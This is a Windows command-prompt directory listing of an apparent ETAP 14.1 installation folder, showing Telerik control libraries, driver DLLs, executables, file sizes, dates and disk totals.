||||||
|
01/02/2016 11:14 876,032 Telerik.Windows.Controls.Docking.dll
|
||||||
|
01/02/2016 11:14 1,039,872 Telerik.Windows.Controls.Gauge.dll
|
||||||
|
01/02/2016 11:14 270,447 Telerik.Windows.Controls.Gauge.xml
|
||||||
|
01/02/2016 11:14 2,611,200 Telerik.Windows.Controls.GridView.dll
|
||||||
|
01/02/2016 11:14 2,254,336 Telerik.Windows.Controls.Input.dll
|
||||||
|
01/02/2016 11:14 2,712,576 Telerik.Windows.Controls.Navigation.dll
|
||||||
|
01/02/2016 11:14 1,668,096 Telerik.Windows.Controls.RibbonView.dll
|
||||||
|
01/02/2016 11:14 1,863,168 Telerik.Windows.Controls.ScheduleView.dll
|
||||||
|
01/02/2016 11:14 405,948 Telerik.Windows.Controls.xml
|
||||||
|
01/02/2016 11:14 453,632 Telerik.Windows.Data.dll
|
||||||
|
01/02/2016 11:14 248,444 Telerik.Windows.Data.xml
|
||||||
|
07/04/2016 11:41 <DIR> Themes
|
||||||
|
01/02/2016 11:14 56,320 TraceView.exe
|
||||||
|
19/01/2016 02:40 29,412,352 ts.exe
|
||||||
|
01/02/2016 11:14 63,488 u2lexpo.dll
|
||||||
|
01/02/2016 11:14 82,432 u2lsqrt.dll
|
||||||
|
01/02/2016 11:14 27,136 u2lstrng.dll
|
||||||
|
19/01/2016 02:34 71,680 UC.exe
|
||||||
|
26/02/2016 16:24 620,032 WCT32DR3.dll
|
||||||
|
26/02/2016 16:38 722,944 wct32dr364.dll
|
||||||
|
30/09/2015 14:48 45,843 WhatsNew_14.htm
|
||||||
|
12/11/2014 14:32 3,702 WorkPermitTemplate.xml
|
||||||
|
26/02/2016 16:25 492,032 WRT32DR3.dll
|
||||||
|
26/02/2016 16:39 592,384 wrt32dr364.dll
|
||||||
|
395 File(s) 992,689,139 bytes
|
||||||
|
19 Dir(s) 11,092,480,000 bytes free
|
||||||
|
|
||||||
|
C:\ETAP 1410>
|
Loading…
Add table
Reference in a new issue